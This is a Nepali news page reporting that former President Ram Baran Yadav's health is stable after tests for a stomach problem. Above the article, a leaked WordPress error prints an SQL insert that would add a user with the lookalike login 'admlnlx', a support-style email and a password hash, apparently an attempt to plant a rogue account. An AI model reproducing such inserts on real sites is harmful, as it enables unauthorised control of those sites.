WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjGNRO9cmx3XkJI1LLUWakNHELhYL./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 12:51:48', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
पूर्वराष्ट्रपति डा. यादवको स्वास्थ्य अवस्था सामान्य – Gaule Khabar

पूर्वराष्ट्रपति डा. यादवको स्वास्थ्य अवस्था सामान्य

पूर्वराष्ट्रपति डा. यादवको स्वास्थ्य अवस्था सामान्य

काठमाडौँ, माघ ७ –

पूर्वराष्ट्रपति डा रामवरण यादवको स्वास्थ्य अवस्था सामान्य बन्दै गएको छ ।

पेटसम्बन्धी समस्या भएपछि विहीबार महाराजगन्जस्थित त्रिवि शिक्षण अस्पतालमा भर्ना हुनुभएका डा यादवको इन्डोस्कोपीलगायतको स्वास्थ्य परीक्षण आज गरिएको उहाँका छोरा चन्द्रमोहन यादवले जानकारी दिनुभयो ।

विभिन्न परीक्षणपछि आएको प्रतिवेदन सामान्य देखिएको छ । अस्पतालमा भर्ना हुनु अगाडि पूर्वराष्ट्रपति डा यादवलाई पेटमा समस्या भएको थियो ।

उहाँको स्वास्थ्य परीक्षणमा वरिष्ठ चिकित्सक प्रेम खड्काको समूह संलग्न छ । चिकित्सकले केही दिन आराम गर्नका लागि सुझाव दिएका छन् । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका